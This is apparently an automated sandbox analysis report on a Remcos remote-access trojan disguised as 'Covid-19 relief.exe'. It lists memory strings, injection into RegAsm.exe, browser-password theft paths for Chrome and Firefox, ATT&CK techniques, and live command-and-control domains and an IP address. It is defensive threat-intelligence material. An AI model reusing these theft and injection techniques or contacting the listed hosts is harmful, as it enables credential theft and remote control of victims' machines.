            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Users\user\Desktop\Covid-19 relief.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Covid-19 relief.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,2_2_00402580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,2_2_00402580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00412163
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00412163

            Stealing of Sensitive Information:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
            Contains functionality to steal Chrome passwords or cookiesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040710F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040710F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040710F
            Contains functionality to steal Firefox passwords or cookiesShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db2_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db5_2_0040728F

            Remote Access Functionality:

            barindex
            Detected Remcos RATShow sources
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exeString found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exeString found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exeString found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
            Source: Covid-19 relief.exe, 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Source: RegAsm.exeString found in binary or memory: Remcos_Mutex_Inj
            Source: RegAsm.exe, 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe2_2_00402B8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe2_2_00402B8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe5_2_00402B8A

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
            Default AccountsCommand and Scripting Interpreter1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1Input Capture111Account Discovery1Remote Desktop ProtocolInput Capture111Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsService Execution2Windows Service1Access Token Manipulation1Obfuscated Files or Information3Credentials In Files2System Service Discovery1SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing3NTDSFile and Directory Discovery3Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptProcess Injection322DLL Side-Loading1LSA SecretsSystem Information Discovery42SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading11Cached Domain CredentialsSecurity Software Discovery111VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection322/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 319675 Sample: Covid-19 relief.exe Startdate: 18/11/2020 Architecture: WINDOWS Score: 100 32 Malicious sample detected (through community Yara rule) 2->32 34 Multi AV Scanner detection for dropped file 2->34 36 Multi AV Scanner detection for submitted file 2->36 38 6 other signatures 2->38 7 Covid-19 relief.exe 3 2->7         started        process3 file4 22 C:\Users\user\AppData\Roaming\Covid-19, PE32 7->22 dropped 24 C:\Users\user\...\Covid-19:Zone.Identifier, ASCII 7->24 dropped 40 Writes to foreign memory regions 7->40 42 Maps a DLL or memory area into another process 7->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->44 11 RegAsm.exe 2 3 7->11         started        16 Covid-19 relief.exe 7->16         started        signatures5 process6 dnsIp7 28 chaseric.ddns.net 194.5.97.21, 24002, 49748, 49750 DANILENKODE Netherlands 11->28 30 chaseric.hopto.org 11->30 26 C:\Users\user\AppData\Roaming\...\logs.dat, ASCII 11->26 dropped 46 Contains functionality to steal Chrome passwords or cookies 11->46 48 Contains functionality to capture and log keystrokes 11->48 50 Contains functionality to inject code into remote processes 11->50 52 Contains functionality to steal Firefox passwords or cookies 11->52 54 Writes to foreign memory regions 16->54 56 Maps a DLL or memory area into another process 16->56 18 RegAsm.exe 16->18         started        20 RegAsm.exe 16->20         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Covid-19 relief.exe40%ReversingLabsByteCode-MSIL.Trojan.Wacatac
            Covid-19 relief.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Covid-19100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Covid-1940%ReversingLabsByteCode-MSIL.Trojan.Wacatac

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.Covid-19 relief.exe.6430000.3.unpack100%AviraBDS/Backdoor.GenDownload File
            2.2.RegAsm.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
            3.2.Covid-19 relief.exe.6440000.3.unpack100%AviraBDS/Backdoor.GenDownload File
            5.2.RegAsm.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            chaseric.hopto.org
            		194.5.97.21
            		truefalse
              		unknown
              chaseric.ddns.net
              		194.5.97.21
              		truetrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://management.azure.com/Chttps://login.microsoftonline.comCovid-19 relief.exefalse
                  		high
                  https://login.microsoftonline.comCovid-19 relief.exefalse
                    		high
                    https://management.azure.com/subscriptions/Covid-19 relief.exefalse
                      		high
                      https://management.azure.com/Covid-19 relief.exefalse
                        		high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        194.5.97.21
                        		unknownNetherlands
                        		208476DANILENKODEtrue

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:319675
                        Start date:18.11.2020
                        Start time:14:53:42
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 0s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:Covid-19 relief.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:20
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/3@17/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 18.5% (good quality ratio 11.7%)
                        • Quality average: 46.7%
                        • Quality standard deviation: 42.1%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 55
                        • Number of non-executed functions: 277
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 13.64.90.137, 51.11.168.160, 92.122.213.194, 92.122.213.247, 8.241.11.126, 8.248.113.254, 8.241.9.126, 67.26.139.254, 8.248.119.254, 52.155.217.156, 20.54.26.129
                        • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        14:54:37API Interceptor1084x Sleep call for process: RegAsm.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        194.5.97.21IRS-RELIEF.exeGet hashmaliciousBrowse
                          rGFP17RAXv.exeGet hashmaliciousBrowse
                            LM9ccxRLFs.exeGet hashmaliciousBrowse
                              RAURRr6KZR.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                chaseric.ddns.netIRS-RELIEF.exeGet hashmaliciousBrowse
                                • 194.5.97.21
                                chaseric.hopto.orgIRS-RELIEF.exeGet hashmaliciousBrowse
                                • 194.5.97.21

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                DANILENKODEtax-relief.exeGet hashmaliciousBrowse
                                • 194.5.97.166
                                Ref-BID PRICE.exeGet hashmaliciousBrowse
                                • 194.5.98.252
                                1ttmgYD97B.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                2mtUEXin7W.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                wk59hOo880.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                BCVaSYrgmG.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                30203490666.exeGet hashmaliciousBrowse
                                • 194.5.98.199
                                InSppuoN2s.exeGet hashmaliciousBrowse
                                • 194.5.98.196
                                Av01vC7kS1.exeGet hashmaliciousBrowse
                                • 194.5.97.155
                                yb1rlaFJuO.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                1MwYrZqjEy.exeGet hashmaliciousBrowse
                                • 194.5.99.163
                                IRS-RELIEF.exeGet hashmaliciousBrowse
                                • 194.5.97.21
                                Jvdivmn_Signed_.exeGet hashmaliciousBrowse
                                • 194.5.97.38
                                myupsfile.exeGet hashmaliciousBrowse
                                • 194.5.97.38
                                dO50wcBKmS.exeGet hashmaliciousBrowse
                                • 194.5.97.155
                                Booking Confirmation 11042024251 - copy - PDF.exeGet hashmaliciousBrowse
                                • 194.5.97.146
                                IMG2020_.exeGet hashmaliciousBrowse
                                • 194.5.97.168
                                New Sales.exeGet hashmaliciousBrowse
                                • 194.5.98.100
                                Booking Confirmation 110420203251 - copy - PDF.exeGet hashmaliciousBrowse
                                • 194.5.97.146
                                6duZ9HSt0F.exeGet hashmaliciousBrowse
                                • 194.5.98.17

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Roaming\Covid-19
                                Process:C:\Users\user\Desktop\Covid-19 relief.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):560640
                                Entropy (8bit):7.092997016800572
                                Encrypted:false
                                SSDEEP:6144:oL+0RTQHdWvvurs1UGKuOYmk3auPnfyuSkwzAT0Yne6cjnuQwG2U9bZ8BjAPuE5x:b0x4YvWgqe1fSDzY3e6caBGV9b3PuIT
                                MD5:5DD2C165636EFF7F866E18370351101E
                                SHA1:1A25C2D60553096A67B3C87C6385D3E831E84647
                                SHA-256:E85DE613ABEF99E65212DCD6F8077B03763FA37FA81E7921907C9E9C3859B632
                                SHA-512:2B70590453ACAD83096DA738C43F2CD2060F654999B485FB4873D2F2D82875E5D659C0616698D75A1EA78E7AEA625E9B5A34F3211B5288CF71151D0087BA48E5
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 40%
                                Reputation:low
